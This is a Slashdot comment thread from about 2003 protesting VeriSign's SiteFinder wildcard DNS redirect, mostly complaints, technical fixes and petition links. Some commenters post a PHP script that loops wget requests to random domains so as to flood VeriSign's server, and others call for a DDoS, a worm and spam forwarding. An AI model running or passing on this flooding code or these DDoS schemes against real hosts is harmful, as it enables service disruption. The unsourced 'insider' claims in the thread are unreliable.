Well, there is, because it's ambiguous: "The majority of people want A, most of the rest want B, and a vast minority want C" makes perfect sense in that the vast minority is almost nobody. Equally it is easy to frame a sentence where it means "almost half". And it is easy to frame a sentence where nobody is quite sure what is means. In a vast minority of sentences it is unclear what vast minority means. It is left to the reader to determine, in accordance with his or her prejudices, what "vast minority" actually meant in the last sentence.

Oxymorons like these should usually be avoided - if you want to qualify minority then sizable or insignificant are probably better works.

You need to reject their terms of use!

[royles]

I have simply sent them an email and more importantly a 'letter' that informs Verisign that I do not accept their terms of service and that I am seeking their advice on how to stop making use of their software, considering I do not meet their terms of service.

I have informed them that if they cannot stop providing me with this service, (for which I do not accept their terms, and by which I cannot be bound) then they will have to contact me to negotiate a new set of terms to which I do agree.

I would imagine that if every user that is upset by this new 'service' was to do the same then Verisign would have to do 'something' about it.

Re:You need to reject their terms of use!

[PDAllen]

Well, they would do 'something', namely tell every user individually that they don't give a damn. That idea's about as useful as you telling everyone to write to the government individually and explaining that you disagree with their laws and you want to renegotiate them. Now, if everyone were to do something vaguely useful, like complaining to ICANN or their ISPs (who can return 404 for anything hitting SiteFinder) that might help.

Official Verisign Response

[johnraphone]

Official Verisign Response

What about 3rd level domains?

[blanks]

I didnt see anything in the articals about this. But what if someone goes to something.mydomain.org, Will this take them to a VeriSign website, or will they recive one of my error messages? I own the domain name, it's in use, so what happens with subdomain names?

Re:What about 3rd level domains?

[anarxia]

If mydomain.org exists then it's up to its DNS server.

MAYBE?

[soccerisgod]

Not maybe, absolutely.

As for me, I only trust people as far as I can throw them. Ever tried to throw a whole company?

Re:Is it possible Verisign's move will be irreleva

[soccerisgod]

Luckily, the affected ip range encompasses only one class C network. Of which .11 seems to be the only address actually in use.

Perhaps someone should contact ARIN and ask them about their policies for such abuse (ordering a class c and only using one ip? that can't be legit)...

T-Online blocks

[soccerisgod]

They started to block the site somewhen on tuesday I think. Reports vary, some say that only port 80 on that one IP is blocked, others say the whole site is unreachable.

Re:T-Online blocks

[soccerisgod]

Don't tell me, I already patched my BIND ;)

So Hang'em HIGH

[Delifisek]

SoB'ssss

Kill em kill emm all, dns caches out of control... even I can't connect recent transfered domains. My server forwards me vs site.

I demand an great great gread mother of DDoS for VS...

These a.h.s gonna loose tons of respect....

Fuck VS...

Updated response-

[GQuon]

New Official Verisign Response

to websitesales@verisign.com

[aaron_pet]

Hi

Whenever somebody miispells my internet address, they end up going to sitefnder.veirsign.com!

This is extremely difficult on my disabled users who frequently mispell my sight name, and rely on their browsers error message to know what happened.

They also don't appreciate that the closest match for the common mispellings are an adult site!, but that is besides the point.

As my main web site makers, what can you do? I'd hate having to go with another web design ferm, I trust that you can fix this... was it an upgrade to Windows 2003 that caused this problem? I've heard some bad things about that... but Microsoft patches their stuff pretty quickly.

Fred is out for the moment, had a horrible car accident, I'm corrisponding for him. Thanks!
-Aaron Peterson
aaron_pet@hotmail.com
509 332 7697

even more funny

[GQuon]

http://sitefinder.verisign.com/lpc?url=verisign.co m&host=verisign.com
or
http://sitefinder.verisign.com/lpc?url=sitefinder. verisign.com&host=sitefinder.verisign.com

to: consultingsolutions and their CONTACT INFO

[aaron_pet]

Contact Info to Verisign
http://www.verisign.com/corporate/about/ contact/in dex.html

***rough idea of an email***
To: consultingsolutions@verisign.com
Subject: work that needs to be done quick/bid request

Body: Hi, I have a project that needs to be done ASAP, It just might be worthwhile for me to outsource this job, but the deadline is aproaching quickly.

The project: I must find a way to help my customers keep away from unwanted sights and know what they are getting into. I estimate that my cost of having people directed to a sight without a proper error message will be -$1.00

Please, in your estimates consider that my customers mispell about 100 domain names per day. I need to provide them with a sure way to know that they missed their website, as our network relies on the error message for a missed domain name to operate properly.

So, I suppose a web browser based solution might work for you guys... make a BROWSER PLUG-IN for people who what your functionality. and I'm looking forward to that money!

Thanks, I look forward to reaping the rewards of your venture!
-The Devil
666 Center of the earth
(666) 666-6666

native americans

[RMH101]

...ring a bell, anyone?

Re:native americans

Yes, you are right. Those damn Native Americans WERE squatters. Thinking they could just sit there on OUR land and make us buy it. We need to push Verisign out just like the Native Americans.

How come noone complains about other TLDs?

[Harald+Paulsen]

Tried http://www.jflkdsjads.cx/ or http://www.jflkdsjads.nu/ lately? Other TLDs have had this for years, yet noone has complained about them. I'm all for stopping what VeriSign is doing now, but we should round up ALL the guilty parts while we're at it.

Re:How come noone complains about other TLDs?

[David+Byers]

You got it in one.

Those domains have been set up that way for years. I wager they've been set up since those ccTLDs became popular. And they don't respond to SMTP connections.

The com and net gTLDs have *not* been set up that way for year and we really don't want them to be.

Re:How come noone complains about other TLDs?

How come?

Cuz nobody gives a fuck about .cx or .nu

But of course you are correct, it is wrong no matter who does it.

Re:Is it possible Verisign's move will be irreleva

[kdsolutions]

this is liken to a virus that warns you that it is going to format your hard disk next time you reboot, tells you what file it is loacted in and how to delte it, then exits.

Even an idiot can fix it.

What, like this one?

#!/usr/bin/php4 -q
<?php
$charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW XYZ0123456789";
while (true) {
$str = 'wget --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" --output-document=/dev/null --recursive --level 1 --timeout 30 http://www.';
$len = rand(5, 24);
for ($i=0; $i<$len; $i++) {
$idx = rand(0,strlen($charset)-1);
$str .= $charset[$idx];
}
$str .= ( ((rand()%2)==0) ? '.com' : '.net');
print $str."\n";
system($str);
sleep(rand(4, 20));
}
?>

Hey- they stole my domain!

[tbase]

I registered a domain name last night for the girl who took our wedding photos. I paid for it, filled out the info, and now when I go there, I get ads for her competition. If that isn't an unfair business practice, I don't know what is.

Clause 14

[Artifex]

AGREEMENT TO BE BOUND.
By using the service(s) provided by VeriSign under these Terms of Use, you acknowledge that you have read and agree to be bound by all terms and conditions here in and documents incorporated by reference.

So... we're forced to a server, then told that by going to it, we agree with their rules?

Anyone found the lawsuit?

[muldrake]

I searched PACER, but it's not listed in the U.S. Party/Case Index yet. I have, however, for amusement, put up all the litigation to date involving VeriSign at http://buttersquash.net/archives/verislime1.htm.

When possible, I'll try to get the lawsuit itself. When I do, I'll link it from http://buttersquash.net/archives/000058.php.

That is, unless someone else has done it already.

how to call Verisign and complain

[chongo]

n addition to a number of already posted suggestions, I recommend that you call Verisign and file a complain:

+1 703-742-0914 (worldwide)
+1 888-642-9675 (toll free US/Canada)

When you call, select:

* 1 (purchase an product or renew an exist product)
* then 7 (all other questions)

I recommend that you be patient with the Verisign rep that answers the phone. That person may not fully understand the issue / problem, and they are unlikely to personally be responsible for the Verisign decision. Remember that you are objecting what Verisign as a company is doing. Don't yell at the rep. Be polite but firm.

Ask Verisign to stop the wildcarding now. Explain why what they are doing is wrong (such as being unable to determine of a EMail message is being sent from a bogus / non-existent domain because thisdomaindoesnotexist.com resolves to 64.94.110.11).

If you do business with Verisign now, tell them that you will switch vendors unless Verisign stops this practice in X weeks. (fill in the X)

You might want to leave your phone number and request a callback. Anonymous complaints do not go as far.

If you are in the US, you might want to contact your local member of congress and object about what Verisign is doing. Let Verisign know that you are doing this when you call.

Yes, they might flush your complaint down /dev/null. But I suspect that pressure from all fronts might help. I have been told (off the record) that some people within Verisign are not happy with their wildcarding. Complaints get logged into a database that these people can review. Your complaints, in volume, might help those folks make a stronger case against top-level wildcarding.

Re:how to call Verisign and complain

[Kphrak]

I called them just now and basically said the stuff above. I own a few domain names bought from them, and will be transferring them to another provider. When I told them why, they read off a script that told me why their service was so great. Here's their answers and my responses:

"Before, the user would get an unhelpful error message. Now, users always know where to go!"

"That's good on paper, but the problem is that DNS is an inappropriate area to conduct that redirection. Yahoo or Google.com are well-known and can supply searches if users don't know where to go. In addition, Microsoft has a search feature in Explorer that redirects users to MSN. Putting this feature in DNS breaks the Internet technical specifications, called RFCs, and damages many processes on the Internet."

"This won't affect your domain names, people will still be able to get to you."

"The main problem is that Internet processes -- mail, DNS, and transfer-related software -- often use the information that no site was found in order to know what to do next. If a domain name always gets resolved, much of it will break."

"Verisign has set this up as a feature to improve the Internet."

"I'm sorry, but I don't believe that; your company has a lot of bright people working for it who know that this is not a feature in any way, shape, or form. It's my opinion that Verisign is trying to grab traffic from well-known search sites by using its control of the .com and .net TLDs to redirect users to a search engine branded by Verisign. I'm not going to transfer my domains yet, because I'm going to wait and see for a week or two, because I'm hoping your company will change their minds and understand that this isn't a good thing for the Internet. But I am going to transfer them if this issue does not get resolved."

Anyway, they gave me this email address: sitefinder@verisign-grs.com . Send 'em an email. And call that number! Be patient -- it's not the call-center people's fault and they won't like being screamed at -- but be firm, because they're reciting from a brochure given them by upper management, and they're going to give you the canned answers found above. The call-center girl sounded pretty tired of answering this, and I figure a lot of people are complaining. If they see half their business disappearing down the tube, maybe they'll see the light. ;)

Revoke Their CA Certs!

[dbitter1]

What would be a really effective punishment is if all the SSL providers issued a CRL with Verisign's CAs on it.

Their stupid "trust" campaign would quickly crash to the ground when every browser threw up a security warning, VPN clients were rejected, wire transfers were rejected, and secure mail was flagged.

Then, after ICANN revokes their right to be a root server and a registrar, and no revenue comes in from their CA services, they die off like SCO is going to...

No better links???

No one can come up with better and funnier links? Bad Slashdot! I'm very disappointed!

Down with Verisign!

Why is it so hard to create a simple business that does one purpose, generates standard profits and annoys no-one?

In America, we have a serious problem with utility companies, healthcare companies and all of the firms that helped to "privatize" our various government sectors.

For some odd reason, its ethical to take the act of renewing your driver's license, and turn it into a state granted money making monopoly.

And, for the same odd reason, its ethical and legal to turn over a very simple process (domain registration) to a bunch of morons who can't do it right, but still get to earn profit on it.

how to complain about Verisign to ICANN

[chongo]

In addition to signing the:

online petition

you can file a complaint about Verisign to ICANN by using their:

Registrar Problem Report Form

Re:how to complain about Verisign to ICANN

[character+sequence]

Speaking of that online petition, does anybody else see only 178 signatures reported from the "View Current Signatures" page? I'm sure it was past 1600 a couple of days ago, but now seems stuck on just 178. Or is some cache out there just giving me an out-of-date copy of it?

Partial Windows Fix

[goofy183]

If your on a windows machine there is an easy fix for PART of the problem. Just go into your hosts file:

C:\WINDOWS\system32\drivers\etc\hosts
or
C:\WI NNT\system32\drivers\etc\hosts

and add the line
0.0.0.0 sitefinder.verisign.com

Now this won't fix the DNS resolution problems but it will at least stop your browser from hitting the sitefinder page.

Tracking terrorist?

[Dark+Coder]

Oh, the way I see it is for some anonymous anti-terrorist related tracking government agency to track for some kind of a needle in the haystack.

What better way to do this than to capture all of the mistyped domain names. Or thoses that are running their own Root DNS servers and catching those that forget to enter in the correct root servers address?

My two cents worth on Verisign's boondoogle.

Ooh!

[Greyfox]

Put them in the ring and let them settle it with a deathmatch! Last one standing wins! My bet on the winner is: Humanity!

Re:Is it possible Verisign's move will be irreleva

[Alien+Being]

"And we did it to ourselves."

For the short term, there was little choice. The Net moves faster than the courts. In the longer term I agree with you.

Verisign claimed that they are doing this to help users by eliminating cryptic DNS errors. These measures will demonstrate the Net's disapproval of the wildcards, and show that they are not "helping". And if they attempt to circumvent the new BIND (with new IP's, wildcard NS records, etc.), it will help prove that they lied about their motives.

Good has come out of this for me.

[analog_line]

While I'm appalled at VeriSign's rank power grab, it's probably done me, personally, more good than harm Why you ask? Well, I took the time to get up to speed on BIND 9 and am running my office/home DNS on local machines, and uitilizing the code that blocks Verisign's hijacking attempt from affecting me.

Now I can charge my clients for setting up a DNS server on their local networks on any spare crap machine they have lying around, making their networks more resilient to ISP DNS outages and crap like this.

Now I have every excuse I might need to move all my clients name registrations to another registrar ASAP, and all the reason I need to not use VeriSign, or be plagued by their idiot customer service ever again!

Thank you Verisign, for teaching me how to laugh about love...again.

petitiononline.com losing signatures?

[ddeboer]

Anyone else notice anything wrong with this petition on petitiononline.com? When I load it, it only shows "178 signatures" ...? (I know there were a lot more than that yesterday...?!?)

Re:petitiononline.com losing signatures?

[ultrasound]

When I went to petitionononline.com I couldn't find the petition site, instead I came across a very useful search engine for the World Wide Interweb from those good people at Verisign :-)

However to be fair it does provide a link to the correct site. I'm sure that won't last.

Re:petitiononline.com losing signatures?

[drakaan]

WTF is that all about? Where is *my* signature?

Re:petitiononline.com losing signatures?

[MadEyeMoody]

Well, yesterday evening there we over 16,000. When I glanced at the site this morning there were only about half that. I wonder how long it'll take the number to go negative.

I just fired off an email to the author in case he's not aware.

Re:petitiononline.com losing signatures?

[turg]

The petition overwhelmed petitiononline's system when it got to about 12,000 signatures. It's been moved to http://www.whois.sc/verisign-dns/.

Re:petitiononline.com losing signatures?

The petition overwhelmed petitiononline's system when it got to about 16,000 signatures. It's been moved to http://www.whois.sc/verisign-dns/.

Re:Is it possible Verisign's move will be irreleva

[op00to]

You don't think any anti-verisign pissing and moaning could have just been the regular slashdot knee-jerk reaction to ANYTHING? Naw, couldn't be. Everyone thought this was going to DOS their DNS servers, or something.

Ultimate Squat

[sunbane]

It would be interesting to get ahold of the logs from this website though - then you could really see where you need to be squatting!!! Most coomonly typed unused domain: "www.verisignsmellsofelderberry.com" ... er... or something along those lines as we all checked to see if this was for real!

Mountain View- not to be a pest but

[Typoboy]

Mountain View, California is a city [home of netscape, sgi, .. ] and not a company.. unless I'm missing something (and I thought I read the article)

Can I send VeriSign a bill?

[jbottero]

Not only that, but if someone had a domain, but didn't have a host in the domain, they're claiming that as theirs, too.

What about this? Not just squating on unregistered domains, but also squating on domains that *ARE* owned but not hosted or otherwise pointed at anything?

I wonder if I can send them a bill for using my domain name?

Thief versus Thief

This is just one crook duking it out with another crook.

Suggestion: broken ribbon protest

[TheLink]

Verisign doesn't want to NXDOMAIN? Fine then we should all give Verisign what it asks for - traffic to nonexistent domains.

Y'know those "ribbon" stuff people used to put on their webpages as a sign of protest?

Well here's my suggestion, every protester should use a "broken ribbon" logo on their webpage that's pointed to a random nonexistent url e.g. random.nonexistent.site.com.

e.g. img src="http://www.jrytcmtproyncz.com/" height=1 width=1

(Leaving the angle brackets out because Slashdot's engine sucks - it's too stupid to treat plain old text as plain old text.)

You should use a random img url but it doesn't have to change much if at all.

The height and width should be set to 1 so that if some idiot tries to push an offensive image, it doesn't get seen by the person viewing your webpage.

You could in theory construct a broken ribbon logo with an html table of different 1x1 imgs (all different URLs). 16 by 16 pixel icon could be 64 requests to nonexistent domains (drawing the ribbon), and the rest point to single background 1x1 image.

Then if Verisign figures out a cheap way to deal with all the SYN packets heading their direction and still redirect users to a webpage, they'll have solved the "defend against DDOS SYN flood" problem.

Some people say there's no technical solution to this problem.

But add enough people and this might work.

Slashdot and a few other popular sites could do this too.

Uh.. Mountain View?

[EvilStein]

Mountain View, CA is where Verisign is located, guys.. the City of Mountain View is NOT suing Verisign. :P

Verisign now lurks in the old Netscape buildings at the intersection of E. Middlefield & Ellis in Mountain View.
Feel free to take a leak into the fountain in the yard. :)

How about:

If you have to ask this, then you're not adminning your own DNS.

You should ask your DNS admin.

Not really

[mccrew]

People do a request for a site, e.g. intranet.internal.foo.org. The external DNS servers fail in that they don't come back with an answer, and then the client continues through its list of DNS servers until it gets to the internal servers where it gets an answer.

Not quite. Assuming foo.com is a valid, registered domain, then the DNS administrator for the foo.com domain can add his own wildcard record (as [s]he could always have done). The Verisign ploy will not work in this situation.

In the situation you describe above, the responsibility rests squarely on the shoulders of foo.com's DNS administrator, not evil Verisign. The Verisign problem only comes into play when the part immediately before the '.com' is not registered, for example, lkjfsd8934hf.com.
> host lkjfsd8934hf.com
lkjfsd8934hf.com has address 64.94.110.11
> host lkjfsd8934hf.yahoo.com
Host lkjfsd8934hf.yahoo.com not found: 3(NXDOMAIN)

-Steve, who has a wildcard record set up for his domain.

Re:Is it possible Verisign's move will be irreleva

[scrytch]

> At what cost? Routers are working harder, code has been introduced into core servers that has no technical reason to exist,

Actually, the BIND fix does have technical merit on its own, it addresses the possibility of "rogue" servers in general, which can be from clueless lame delegation, all the way up to the biggest registrar in the world. Given that you need to be paranoid about delegations lest you open up the door to cache poisoning, it follows from something called the Principle Of Least Authority that if you're going to trust a server to do delegation, you should only trust it for delegation -- any other duties it performs should be the exception, not the rule. It's the same reason you hand the valet a valet key, and not one that will open the trunk. You might even trust the valet, but do you want to have to? Verisign got away with this because we trusted them to hand out A records, when for most people, they never had to.

DNS was of course not built that way, but you can now at least put these policy walls up if you want to. It might suck for people who have A records hosted by verisign so that foo.com will point to their webserver as well as their NS, SOA, and MX records, but at least it would only affect people who did business with Verisign.

Looks like earthlink is among the ISP's now defeating Verisign's land grab, I get a "server failure" result for nonexistent .com names... Odd result, but I can see the reasoning.

Bind 9.2.3rc2 RPM

Lets just all update our servers and get them off of this kick. I have made a RPM and SRPM for RedHat 8/9.

penguinman.com

We need a new MSBlaster

...that attacks sitefinder.verisign.com, hell, wildcardthisassholes.com would do it.

Next step for ISPs

[bug-eyed+monster]

The next step for all ISPs (and website providers etc) is to actively discourage people registering .com and .net domains. Tell the customers that Verisign, the registrar, is hard to work with, and that other TLDs such as .ws are becoming much more popular.

The goal is to make Verisign lose more and more revenue. Blocking this service doesn't cost Verisign much, and lawsuits are just a temporary expense. We should make a point that nobody on the internet can get away with this kind of crap.

so it's still not really blocked?

[jmarkantes]

If they're not returning a domain not found message, and instead going to a webpage, then it's not really fixed/blocked it would seem. The ISP has just started doing what verisign is doing. Probably not collecting data from these mis-types, but it's still breaking DNS.

Just a thought.
J

Duh

[kalislashdot]

Saw this lawsuit coming a mile away. Waht the hell is ICANN doing anyways, nothing I tell you NOTHING! You think they would set strict rules so this kind of stuff does not happen.

Sitefinder.verisign.com has a web bug

[Yer+Mum]

There's a 1x1 gif image in the sitefinder page, this is the URL that refers to it...

http://verisignwildcard.112.2o7.net/b/ss/verisig nw ildcard/1/G.2-Verisign-S/s75019259531159?[AQB]&ndh =1&t=19/8/2003%2018%3A54%3A6%205%20-60&pageName=La nding%20Page&ch=landing&server=US%20East&c1=NOTHIN G&c2=NOTHING%20%2800/00%29&c3=NOTHING%20%28DYM%29& c12=No&c13=00&c14=No&c15=00&c16=Yes&c17=15&c22=NOT %20SET&g=http%3A//sitefinder.verisign.com/index.js p&s=1024x768&c=16&j=1.3&v=Y&k=Y&bw=1024&bh=614&p=R ealPlayer%28tm%29%20G2%20LiveConnect-Enabled%20Plu g-In%20%2832-bit%29%20%3BWindows%20Media%20Player% 20Plug-in%20Dynamic%20Link%20Library%3BShockwave%2 0Flash%3BShockwave%20for%20Director%3BMicrosoft%C2 %AE%20Windows%20Media%20Services%3BAdobe%20Acrobat %3BMozilla%20Default%20Plug-in%3BJava%20Plug-in%3B QuickTime%20Plug-in%206.0.2%3B&[AQE]

Why would they want to know my plugins and screen size, amongst other things?

Oh well, not to difficult to get Mozilla to block that at the cookie it sets.

thanks

[Sovern]

thank you.

About time...

[johnwyles]

Geez it's been at least 3 times... It's about time somebody sued these idiots...

Re:Is it possible Verisign's move will be irreleva

... ICANN will likely jump into the fray any time now. ...

If they do, it will be too late.

Think about it for a moment. Designers and implementors have been working for years on the not-unreasonable assumption that when they make a request to the name service to resolve a particular name in a particular context the name service can be relied upon to tell them "nothing on record" when there are no valid matches to the request. Verisign has deliberately changed the behaviour of the nameservers it operates (under contract) for the single most important top-level domain on the Internet so that this assumption is no longer accurate, apparently in an attempt to attract additional business and revenue. Verisign's nameservers are now returning invalid information to a certain set of requests to resolve names for which there is no registered information. The matter really is that basic and that simple.

And ICANN has not, apparently, yet realised that its own credibility as the designated supervisor of Internet name-related issues is at stake. Kudos to the people who are trying to attract ICANN's attention (see this story in El Reg), but I can't help but conclude that ICANN's already flunked this issue.

Personally, I wonder what's going on within Verisign. I would guess that the people in the digital signature operation must be mad as heck at the cowbows in the name services unit. After all, how trustworthy is a certicifate that is used to authenticate identity for - amongst other things - significant financial transactions, when it is issued by a company that doesn't understand that telling lies about hostnames is, um, wrong?

terms of use

[endx7]

Heh, http://sitefinder.verisign.com/terms.jsp is an interesting read.

I had to modify the following a bit from the original. Slashdot wouldn't let me post it as it was (Lameness filter encountered. Post aborted! Reason: Don't use so many caps. It's like YELLING.)

Sole Remedy.
your use of the verisign services is at your own risk. if you are dissatisfied with any of the materials, results or other contents of the verisign services or with these terms and conditions, our privacy statement, or other policies, your sole remedy is to discontinue use of the verisign services or our site.

And just how am I supposed to stop using this? It's kinda forced upon me (besides not using the net at all...).

Results from calling Verisign

[Veovis]

I was told to email all questions/comments to this email address: sitefinder@verisign-grs.com now lets all foward our mailservers's spam filters to this address

Re:I don't agree - they reply

[howhardcanitbetocrea]

I wrote Verisign them telling them I don't agree. They have replied and so have I with another hole in their logic. Nice of them to give me their email sitefinder@verisign-grs.com - please, feel free to use it...

What if:

[Chibouki]

What if:

a) Xenu's Link Sleuth is a Windows program that checks broken links
b) Xenu is an excellent worldwide free product written by Tilman Hausherr
c) Tilman fights Scientology
d) Verisign is controlled by Scientology (can't prove it, so)
e) Verisign lauch Sitefinder
f) Xenu.exe program is almost unusable

My two cents.

UPDATED PETITION SITE (please mod this up)

[GeorgeK]

I authored the petition. Seems the old site is Slashdotted, and so it's now on a NEW server. Please change your links to point to:

http://www.whois.sc/verisign-dns/

instead. Hopefully this server survives!

I've made mirrors here too, in case the primary goes down again. We lost some data, but not the first 10,500, as I had archived them.

I also made an announcement on the ICANN mailing list here and here.

Well, they just closed that off...

I was persuing getting them to be the test-case for deep-linking by having them post the newest Dilbert on their page and reporting them to United Media, or maybe even siccing the Scientologists on them by inlining The Fishman Affidavit, but alas, that avenue of fun has ended. As I watched, a change propogated through the servers such that all the passed URL information is first translated into "web-friendly" format, ie: <s and >s get translated into & lt; and & gt; etc., so you can't sneak tags in there anymore, and they even put "try again" in the title tag, as if they were taunting us...

BOO!!!

Re:Well, they just closed that off...

As I watched, a change propogated through the servers such that all the passed URL information is first translated into "web-friendly" format, ie: s get translated into & lt; and & gt; etc.

Which is <em>stupid</em> since it is in JavaScript not HTML! They're like "Yes, we know we're stupid and shitty coders, the users input will surely leak from our scripts to our websites content, so let's make it web-friendly from the beginning. Yes, we suck that much." A bunch of amateurs!

they hijacked every unregistered domain

[stokkeland]

so that is what f'in happened, all the sudden everytime I misspell something I get a searcn page instead of domain not found.... stoke@hildur:~$ host fdlkfjdlksfjdlskjsflhsfdkljhsfdljkhsfd.com fdlkfjdlksfjdlskjsflhsfdkljhsfdljkhsfd.com has address 64.94.110.11 stoke@hildur:~$ host verisignisonesneakyasswipebitch.com verisignisonesneakyasswipebitch.com has address 64.94.110.11 if this isnt illegal, then what is? Netsol/Verisign etc has once again proven that they do not care about anyone but themselves!! You bastards!

VeriSign is not the only one

NeuStar, which exclusively controls the .biz and .us domains, has been using a similar service on and off since June. They have been attempting to divert the typo traffic to a paid search engine for profit, and have made money doing so. Originally, they had been collaborating with VeriSign for months behind closed doors to create a service like SiteFinder, but they were unable to agree on who got what money, and the joint deal never happened - they went their own ways.

VeriSign built their own system, which obviously works fine. NeuStar has no such resources or knowledge, and outsourced the building of their system. Unfortunately for them, it is plagued with problems and has never worked right, because they partnered with a couple of morons to build the system for them (an ex-journalist and an ex-IT manager, who thought they could build an 'Internet' company) The NeuStar system is not currently running, because it screwed up the NeuStar .biz and .us DNS servers, but it has been running on and off for months.

Just a little FYI about other registries already using a SiteFinder-like service, from a developer at a company the morons tried to hire to help them fix the broken service they built for NeuStar. Naturally, we declined to help them try and steal web traffic for profit.

As far as ICANN goes, they knew the registries (both VeriSign and NeuStar and others) were building projects to intercept and sell mis-typed domain traffic. VeriSign and NeuStar legal teams had even met with ICANN to discuss the feasibility of the projects. ICANN agreed with the concept, and to 'see how it goes once implemented'. Their recent silence followed by the 'advisory' is simply their attempt to over themselves after the fact - they knew it was coming, and conceptually bought off on the idea.

So there you have it, from an insider. I guess next time you should have us sign NDA's, morons.

Re:Can it be used AGAINST Spam?

We know there are thousands of robots fetching email addresses from web pages for later spamming. But now those bots will not be able to distinguish between valid and invalid domain of the addresses, so they will try and send millions of invalid mails, reducing hopefully the hit ratio over true mail accounts.

Lets contribute: bla@jsif8shehehe.com lalala@the82have21notno.com ... and so on

As seen on (spanish /.): http://barrapunto.com/comments.pl?sid=36380&cid=21 8110

Ownership

[fm6]

Your description of ownership is technically correct, but kind of beside the point. Owning something isn't some magical relationship that automatically give you total control over your property. It actually works the other way: ownership is a legal concept that codifies that relationship. Which relationship is founded on some kind of control.

Lets look at some of your examples. Yes, mutual funds are "owned" by their investors. But for all practical purposes, funds are a product and investors are the customers. Just this morning I head the New York AG talk about abuses by these business. One is that they let some investors do short-term deals that are supposedly forbidden by the terms of the fund. The interesting thing is that this is only illegal because the fund claims that this practice is forbidden, in order to hold down costs. Claim that they do this when they don't is a kind of fraud. Doesn't sound like an owner-manager relationship to me, even if it is technically.

Near where I live, there's a beach that's private property. But people have used that beach without anyone trying to stop them for something like 150 years. That usage creates something called a "public easement", which basically means that the owners of the beach no longer have the right to fence it off. Which is another example of the non-magic status of ownership -- this one actually mandated by law.

Ownership is just one form of control -- and it's not always the most effective form. You can argue that VeriSign is acting as if they "own" the database when they don't. But that's an abstract, irrelevent argument. Better to ask whether VeriSign has too much control over the database. If they do, then we should do something about it, and never mind the pseudo-legal nitpicking.